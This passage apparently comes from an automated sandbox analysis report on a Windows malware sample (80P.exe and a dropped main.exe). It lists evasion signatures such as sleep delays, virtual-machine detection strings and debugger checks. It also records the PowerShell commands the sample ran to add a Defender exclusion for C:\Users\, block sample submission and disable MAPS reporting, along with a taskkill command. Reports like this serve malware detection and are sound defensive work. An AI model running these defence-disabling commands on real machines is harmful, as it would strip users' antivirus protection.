                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_20-62209
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI coverage: 8.7 %
                    Source: C:\Users\user\Desktop\80P.exe TID: 6980Thread sleep time: -23520000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 5789 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep count: 4067 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep count: 8826 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep count: 697 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144Thread sleep count: 7894 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep count: 1724 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5480Thread sleep count: 113 > 30
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5480Thread sleep time: -56500s >= -30000s
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6260Thread sleep count: 56 > 30
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1608Thread sleep count: 118 > 30
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1608Thread sleep time: -59000s >= -30000s
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                    Source: C:\Users\user\Desktop\80P.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD61CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FF6BFD61CF3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0E166233
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0EB4B333
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EBD4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0EBD4013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EC05013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0EC05013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE115057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE115057B3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE133031F3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116B6233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE116B6233
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116EB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE116EB333
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE11714013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE11714013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE11745013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE11745013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE117757B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE117757B3
                    Source: C:\Users\user\Desktop\80P.exeThread delayed: delay time: 120000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Amcache.hve.29.drBinary or memory string: VMware
                    Source: Amcache.hve.29.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.29.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.29.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.29.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.29.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.29.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.29.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.29.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.29.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.29.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: 80P.exe, 00000001.00000002.2933766235.0000000001223000.00000004.00000020.00020000.00000000.sdmp, jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956108467.000002A565807000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898332419.0000013B440DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: main.exe, 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33
                    Source: Amcache.hve.29.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.29.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.29.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.29.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.29.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.29.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.29.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.29.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.29.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.29.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.29.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.29.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.29.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.29.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\80P.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD6DEBE GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,20_2_00007FF6BFD6DEBE
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD68563 strlen,strlen,_mbscpy,strlen,strlen,FreeLibrary,GetProcessHeap,HeapAlloc,_mbscpy,20_2_00007FF6BFD68563
                    Source: C:\Users\user\Desktop\80P.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD61131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,20_2_00007FF6BFD61131

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EB49EA7 strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,20_2_00007FFE0EB49EA7
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
